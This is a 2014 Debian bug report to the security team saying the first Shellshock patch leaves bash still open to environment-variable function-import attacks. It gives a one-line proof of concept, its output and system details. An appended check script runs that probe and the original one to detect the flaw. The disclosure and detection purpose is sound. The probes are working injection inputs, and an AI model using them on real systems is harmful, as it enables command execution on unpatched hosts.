[Secure-testing-team] Bug#762760: bash: still vulnerable to environment exploits
brian m. carlson
sandals at crustytoothpaste.net
Wed Sep 24 23:41:44 UTC 2014
Package: bash
Version: 4.2+dfsg-0.1+deb7u1
Severity: critical
Tags: security
As Tavis Ormandy has tweeted[0], the existing patch is not sufficient to
solve the problem:
vauxhall ok % dpkg -l bash | grep ^ii; rm -f echo; env X='() { (a)=>\' bash -c "echo date"; cat echo
ii bash 4.2+dfsg-0.1+deb7u1 amd64 GNU Bourne Again SHell
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
Wed Sep 24 23:32:32 UTC 2014
This means all Debian systems are still vulnerable, as bash is an
essential package.
[0] https://twitter.com/taviso/status/514887394294652929
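An added defender-side check (not part of this bug report) that runs the probe shown above, together with the original function-import probe, against the installed bash inside a temporary directory so the caller's working directory is never touched; the function name and exit codes are my own choices:

```sh
#!/bin/sh
# Added check, not from the bug report. Probes the installed bash for the two
# exported-function parsing bugs. Exit status: 0 = neither probe triggered,
# 1 = at least one probe triggered, 2 = bash or mktemp unavailable.
# Assumes a POSIX sh with env and mktemp available.

shellshock_check() {
    bash_bin=$(command -v bash 2>/dev/null) || return 2
    tmp=$(mktemp -d) || return 2
    status=0

    # Probe 1: the original function-import bug. Anything after the function
    # body in the variable value must not be executed on import, so a fixed
    # bash prints nothing here.
    out=$(env X='() { :; }; echo PROBE1' "$bash_bin" -c : 2>/dev/null) || :
    if [ "$out" = "PROBE1" ]; then
        echo "vulnerable: trailing command after exported function was executed"
        status=1
    fi

    # Probe 2: the incomplete-fix parser bug from this report. The failed
    # import leaves a dangling redirection in the parser, so "echo date"
    # runs as "date > echo" and a file named echo appears in the temp dir.
    ( cd "$tmp" && env X='() { (a)=>\' "$bash_bin" -c "echo date" \
        >/dev/null 2>&1 ) || :
    if [ -e "$tmp/echo" ]; then
        echo "vulnerable: parser state leaked from failed function import"
        status=1
    fi

    rm -rf "$tmp"
    return $status
}

# Usage: shellshock_check; echo "exit status $?"
```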
-- System Information:
Debian Release: jessie/sid
APT prefers unstable
APT policy: (500, 'unstable'), (500, 'stable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 3.17-rc5-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages bash depends on:
ii base-files 7.5
ii dash 0.5.7-4
ii debianutils 4.4
ii libc6 2.19-11
ii libtinfo5 5.9+20140913-1
Versions of packages bash recommends:
pn bash-completion <none>
Versions of packages bash suggests:
pn bash-doc <none>
-- no debconf information
--
brian m. carlson / brian with sandals: Houston, Texas, US
+1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only
OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187